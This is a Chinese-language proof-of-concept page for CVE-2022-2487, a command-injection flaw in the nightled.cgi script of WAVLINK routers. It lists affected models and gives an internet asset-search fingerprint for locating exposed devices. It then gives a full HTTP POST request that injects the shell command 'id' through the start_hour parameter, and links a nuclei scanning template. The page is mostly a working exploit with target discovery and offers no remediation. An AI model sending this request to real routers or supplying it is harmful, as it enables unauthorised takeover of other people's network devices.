POC/wpoc/Wavlink/WAVLINKnightled.cgi命令执行漏洞(CVE-2022-2487).md

40 lines
1.5 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# WAVLINK nightled.cgi命令执行漏洞CVE-2022-2487
# 一、漏洞简介
WAVLINK是中国睿因科技WAVLINK公司开发的一款路由器该系统nightled.cgi文件存在命令执行漏洞攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。
# 二、影响版本
+ wavlink 路由器
# 三、资产测绘
+ hunter`web.body="firstFlage"`
+ 特征
![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/Rx--2uKs5UATt6Ld/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-514022.png)
# 四、漏洞复现
```java
POST /cgi-bin/nightled.cgi HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
page=night_led&start_hour=;id;
```
![1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed.png](./img/Rx--2uKs5UATt6Ld/1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed-728776.png)
nuclei脚本
[wanlink-router-nightled-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231412-9b8a48ea-e19e-4635-93d4-e8e9113dabfa.yaml)
> 更新: 2024-02-29 23:57:11
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gt5g5cgio0f29oaf>